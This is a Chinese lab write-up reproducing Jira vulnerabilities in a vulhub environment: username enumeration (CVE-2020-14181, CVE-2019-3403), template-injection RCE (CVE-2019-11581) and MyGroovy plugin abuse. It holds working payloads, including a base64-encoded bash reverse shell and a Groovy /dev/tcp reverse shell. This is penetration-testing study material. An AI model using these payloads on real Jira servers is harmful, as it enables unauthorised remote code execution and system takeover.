漏洞笔记--Jira 相关漏洞复现及利用

这篇具有很好参考价值的文章主要介绍了漏洞笔记--Jira 相关漏洞复现及利用。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

简介

Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。

产品快速搭建

为了方便省时间,我们可以利用vulhub靶场去启用jira的漏洞环境
拉取vulhub

git clone https://github.com/vulhub/vulhub.git

cd vulhub-master/jira/CVE-2019-11581/

docker-compose up -d

容器启动后访问IP:8080就可以访问到jira登录界面了。
初次访问需要安装,根据提示jira官网注册一个账号,然后利用账号申请一个可以试用30天的license,最终完成所有配置,进入系统

jira漏洞,jira,网络安全,web安全

漏洞整理

未经身份验证用户名枚举漏洞(CVE-2020-14181)

影响版本

Jira < 7.13.6 Jira 8.0.0 - 8.5.7 Jira 8.6.0 - 8.12.0

漏洞复现

访问

http://192.168.221.132:8080/secure/ViewUserHover.jspa?username=user

提示用户不存在

jira漏洞,jira,网络安全,web安全

访问

http://192.168.221.132:8080/secure/ViewUserHover.jspa?username=admin

发现存在admin用户

jira漏洞,jira,网络安全,web安全

信息泄露(用户名枚举 CVE-2019-3403)

访问

http://192.168.221.132:8080/rest/api/2/user/picker?query=test

未检索到用户

jira漏洞,jira,网络安全,web安全

访问

http://192.168.221.132:8080/rest/api/2/user/picker?query=admin

成功检索到用户

jira漏洞,jira,网络安全,web安全

Atlassian JIRA服务器模板注入(CVE-2019-11581)

利用条件:

已开启联系管理员表单

漏洞复现

开启方式:

管理员登录后访问

http://xx.xx.xx.xx:8080/secure/admin/VerifySmtpServerConnection!add.jspa

进入配置界面

jira漏洞,jira,网络安全,web安全

jira漏洞,jira,网络安全,web安全

先配置好SMTP
接着访问

http://xx.xx.xx.xx:8080/secure/admin/EditApplicationProperties!default.jspa

开启表单

jira漏洞,jira,网络安全,web安全

接着未登录的情况下访问

http://xx.xx.xx.xx:8080/secure/ContactAdministrators!default.jspa

成功访问到表单

jira漏洞,jira,网络安全,web安全

填入poc

$i18n.getClass().forName(‘java.lang.Runtime’).getMethod(‘getRuntime’,null).invoke(null,null).exec(‘curl 172.20.0.1:8888’).waitFor()

在另一台机器上监听8888端口,发送表单

jira漏洞,jira,网络安全,web安全

稍等一会成功收到请求。

接下来我们来反弹shell

进行反弹操作时,由于Runtime.getRuntime().exec()不能执行管道命令的问题,需要将exec内的命令进行base64编码

jira漏洞,jira,网络安全,web安全

exp:

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE3Mi4yMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}").waitFor()

发出请求后成功反弹回shell

jira漏洞,jira,网络安全,web安全

该漏洞在后台也有利用点
http://xx.xx.xx.xx:8080/secure/admin/SendBulkMail!default.jspa

jira漏洞,jira,网络安全,web安全

利用MyGroovy插件进行getshell

管理插件接口地址
http://xx.xx.xx.xx:8080/plugins/servlet/upm?source=side_nav_manage_addons

查看jira对应版本接口地址
http://xx.xx.xx.xx:8080/secure/admin/ViewSystemInfo.jspa

jira漏洞,jira,网络安全,web安全

接着下载对应版本的插件

https://marketplace.atlassian.com/apps/1218755/mygroovy/version-history

jira漏洞,jira,网络安全,web安全

接着从插件管理界面上传安装该插件

jira漏洞,jira,网络安全,web安全

安装成功后,进入MyGroovy console执行反弹脚本,如下

def r = Runtime.getRuntime()
def p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/172.20.0.1/3333;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

jira漏洞,jira,网络安全,web安全

jira漏洞,jira,网络安全,web安全文章来源地址https://www.toymoban.com/news/detail-643199.html

到了这里,关于漏洞笔记--Jira 相关漏洞复现及利用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全--wazuh环境配置及漏洞复现

    目录 一、wazuh配置  二、wazuh案例复现 Virtual Machine (OVA) - Installation alternatives (wazuh.com) 查看自身ip wazuh重启: 当我们使用本地的cmd通过ssh一直连接wazuh的时候便会出现十级报错,此次在后台可以明显的看到有爆破的提示扫描,通过分析其具体的数据包以及对应的规则理解到wu

    2024年02月11日
    浏览(45)
  • 网络安全 log4j漏洞复现

    前言: log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。 漏洞描述: 由于Apache Log4j存在递归解析功能,未取得身份认证的用户,可以从远程发送数据请求输入数据日志,轻松触发漏洞,最

    2024年02月09日
    浏览(62)
  • 惠尔顿 网络安全审计系统 任意文件读取漏洞复现

    惠尔顿网络安全审计产品致力于满足军工四证、军工保密室建设、国家涉密网络建设的审计要求,规范网络行为,满足国家的规范;支持1-3线路的internet接入、1-3对网桥;含强大的上网行为管理、审计、监控模块;用户访问功能,内容过滤功能;流量控制功能、带宽管理功能

    2024年02月22日
    浏览(51)
  • 网络安全--XXE漏洞利用思路

    介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一

    2024年02月13日
    浏览(44)
  • 【网络安全】实操XSS订单系统漏洞(利用盲打)

    博主昵称:跳楼梯企鹅 博主主页面链接:

    2024年01月23日
    浏览(42)
  • 网络安全竞赛——Windows服务漏洞扫描与利用

    1.通过渗透机Kali Linux对靶机场景Windows 7进行系统服务及版本扫描渗透测试,并将该操作显示结果中3389端口对应的服务状态信息作为Flag值提交; 进入kali命令控制台中使用如下命令 Flag:open 2.在msfconsole中用search命令搜索 MS12020 RDP拒绝服务攻击模块,并将回显结果中的漏洞披露

    2024年02月13日
    浏览(44)
  • 【网络安全】MS17-010“永恒之蓝”漏洞的利用

    导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述“永恒之蓝”漏洞的简单利用。 一、实验原理 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻

    2024年02月07日
    浏览(46)
  • 网络系统安全——MS15_034漏洞利用与安全加固

    Kali   192.168.124.162 Windows server 2008   192.168.124.169 检查2008服务器的IIS网站是否正常,进入2008服务器,使用ie浏览器访问本机地址 切换到kali,使用命令ping来测试他们的连通性 然后使用使用命令curl测试,测试:curl http://192.168.124.169 -H “Host:192.168.124.169” -H “Range:bytes=0-1844674

    2024年02月09日
    浏览(47)
  • 网络安全kali web安全 Kali之msf简单的漏洞利用

    靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 从扫描出的端口发现,目标主机开启了135端口,服务为msrpc(远程过程调用服务),即Windows的RPC服务。 ​针对这个服务,我们就可

    2024年02月09日
    浏览(44)
  • 网络安全:Kali Linux 进行SQL注入与XSS漏洞利用

    目录 一、实验 1.环境 2.Kali Linux 进行SQL注入 3.Kali Linux 进行XSS漏洞利用 二、问题 1.XSS分类 2.如何修改beef-xss的密码 3.beef-xss 服务如何管理 4.运行beef报错 5.beef 命令的颜色有哪些区别 6.owasp-top-10 有哪些变化 (1)主机 表1  主机 系统 版本 IP 备注 Kali Linux 2022.4 192.168.204.154(动态

    2024年04月26日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包